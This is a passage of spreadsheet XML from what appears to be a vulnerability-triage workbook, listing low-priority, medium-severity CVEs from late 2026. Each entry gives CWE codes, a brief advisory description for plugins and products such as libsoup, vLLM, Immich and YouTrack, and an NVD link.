      <c r="S493" s="5" t="inlineStr">
        <is>
          <t>Contributor Insecure Direct Object References (IDOR) in Flexible PDF Coupons &lt;= 1.14.11 versions.</t>
        </is>
      </c>
      <c r="T493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62081</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62083</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="inlineStr"/>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="S494" s="5" t="inlineStr">
        <is>
          <t>Subscriber Other Vulnerability Type in Creator LMS &lt;= 1.2.19 versions.</t>
        </is>
      </c>
      <c r="T494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62083</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94173</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S495" s="5" t="inlineStr">
        <is>
          <t>Contributor Insecure Direct Object References (IDOR) in Business Directory &lt;= 6.4.27 versions.</t>
        </is>
      </c>
      <c r="T495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94173</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96450</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S496" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in pixfort Core &lt; 4.3.3 versions.</t>
        </is>
      </c>
      <c r="T496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96450</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97243</t>
        </is>
      </c>
      <c r="D497" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E497" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F497" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S497" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in AllAble Connector &lt;= 0.13.4 versions.</t>
        </is>
      </c>
      <c r="T497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97243</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97285</t>
        </is>
      </c>
      <c r="D498" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E498" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F498" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S498" s="5" t="inlineStr">
        <is>
          <t>Contributor Broken Access Control in The Events Calendar &lt;= 6.17.5 versions.</t>
        </is>
      </c>
      <c r="T498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97285</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97299</t>
        </is>
      </c>
      <c r="D499" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E499" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F499" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="inlineStr"/>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S499" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Request Forgery (CSRF) in Razorpay Payment Links for WooCommerce &lt;= 2.1.5 versions.</t>
        </is>
      </c>
      <c r="T499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97299</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100260</t>
        </is>
      </c>
      <c r="D500" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E500" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F500" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr">
        <is>
          <t>CWE-1188</t>
        </is>
      </c>
      <c r="S500" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 mailbox integration allowed authentication after a password reset</t>
        </is>
      </c>
      <c r="T500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100260</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100508</t>
        </is>
      </c>
      <c r="D501" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E501" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F501" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S501" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Denial of Service Attack in Two Factor &lt;= 0.16.0 versions.</t>
        </is>
      </c>
      <c r="T501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100508</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102144</t>
        </is>
      </c>
      <c r="D502" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E502" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F502" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="inlineStr"/>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-400</t>
        </is>
      </c>
      <c r="S502" s="5" t="inlineStr">
        <is>
          <t>A resource exhaustion vulnerability in Kiteworks Email Protection Gateway allowed an unauthenticated remote attacker to repeatedly trigger a comparatively expensive server-side operation, causing a partial denial of service.</t>
        </is>
      </c>
      <c r="T502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102144</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103241</t>
        </is>
      </c>
      <c r="D503" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E503" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr">
        <is>
          <t>CWE-404</t>
        </is>
      </c>
      <c r="S503" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in vllm-project vLLM up to 0.26.0. This vulnerability affects unknown code of the file rust/src/parser/src/unified/gemma4.rs of the component Gemma4UnifiedParser. Executing a manipulation can lead to denial of service. The attack may be launched remotely. The exploit has been published and may be used. Upgrading to version 0.29.1rc0 is able to resolve this issue. This patch is called 3439bad37e68ba9755a46f4f6b44a4aeaf1f60a9. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103241</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103396</t>
        </is>
      </c>
      <c r="D504" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E504" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F504" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="inlineStr"/>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S504" s="5" t="inlineStr">
        <is>
          <t>bbs-go through 4.4.6 contains a permission bypass vulnerability in the AdminMiddleware authorization logic where the read-only dashboard.user.view permission rule matches the /api/admin/user/synccount endpoint before the intended dashboard.user.update rule. Authenticated users with only view permissions can call the synccount endpoint to trigger expensive full-table user recounts and cache invalidations, causing denial of service through repeated concurrent database operations.</t>
        </is>
      </c>
      <c r="T504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103396</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103399</t>
        </is>
      </c>
      <c r="D505" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E505" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F505" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S505" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in SoupServer (libsoup). When an HTTP/1.x client sends a request with Expect: 100-continue and a request body, and SoupServer returns an early final (non-1xx) response before the body is read, the server neither drains the declared body bytes nor closes the connection. On a keep-alive connection, those leftover bytes are interpreted as a subsequent HTTP request. A remote, unauthenticated attacker can place a complete HTTP request in the body and cause SoupServer to process that smuggled request, leading to unintended request handling.</t>
        </is>
      </c>
      <c r="T505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103399</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103476</t>
        </is>
      </c>
      <c r="D506" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E506" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S506" s="5" t="inlineStr">
        <is>
          <t>yii2-starter-kit through 4.2.0 fails to validate article publication status in the attachment-download endpoint, allowing unauthenticated attackers to download files from draft articles. Attackers can enumerate sequential attachment identifiers to retrieve files from unpublished articles without authentication or authorization checks.</t>
        </is>
      </c>
      <c r="T506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103476</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103532</t>
        </is>
      </c>
      <c r="D507" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E507" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr">
        <is>
          <t>github</t>
        </is>
      </c>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-285</t>
        </is>
      </c>
      <c r="S507" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in immich-app Immich up to 2.7.5. This affects the function checkSharedLinkAccess of the file server/src/utils/access.ts of the component Shared Link Preview Handler. The manipulation of the argument Password leads to improper authorization. The attack may be initiated remotely. The reported GitHub issue was closed with the label "duplicate".</t>
        </is>
      </c>
      <c r="T507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103532</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103548</t>
        </is>
      </c>
      <c r="D508" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E508" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F508" s="5" t="inlineStr">
        <is>
          <t>psirt@paloaltonetworks.com</t>
        </is>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr">
        <is>
          <t>CWE-257, CWE-260, CWE-261</t>
        </is>
      </c>
      <c r="S508" s="5" t="inlineStr">
        <is>
          <t>Improperly stored passwords in the config file in Itron MV-90 xi 3.0 allows attackers to decode the passwords and password histories to gain access to the MV-90 application as any user.</t>
        </is>
      </c>
      <c r="T508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103548</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86778</t>
        </is>
      </c>
      <c r="D509" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E509" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F509" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="S509" s="5" t="inlineStr">
        <is>
          <t>Observable response discrepancy vulnerability in Maksisoft Technology, IT, and Software Industry and Trade Inc. Maksisoft Gym allows Account Footprinting.
This issue affects Maksisoft Gym: from 0.5.10 before 0.5.11.</t>
        </is>
      </c>
      <c r="T509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86778</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92537</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
